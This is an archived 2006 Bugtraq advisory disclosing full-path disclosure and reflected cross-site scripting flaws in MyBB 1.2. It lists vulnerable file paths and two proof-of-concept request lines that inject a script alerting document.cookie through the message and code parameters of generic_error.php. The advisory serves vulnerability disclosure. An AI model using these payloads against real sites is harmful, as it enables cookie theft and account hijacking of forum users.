Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

MyBB 1.2 Full path and Cross site scripting vulnerabilities

From: security () soqor net
Date: 17 Sep 2006 15:23:22 -0000
Hello

Title : MyBB 1.2 Full path and Cross site scripting vulnerabilities
Discovered by : HACKERS PAL
Copyrights : HACKERS PAL
Website : WwW.SoQoR.NeT
Email : security () soqor net

Full path
inc/generic_error.php?message=1
inc/datahandlers/event.php
inc/datahandlers/pm.php
inc/datahandlers/post.php
inc/datahandlers/user.php

Full path and Xss
inc/generic_error.php?message=<script>alert(document.cookie);</script>
inc/generic_error.php?message=1&code=<script>alert(document.cookie);</script>

WwW.SoQoR.NeT
Previous By Date Next
Previous By Thread Next

Current thread: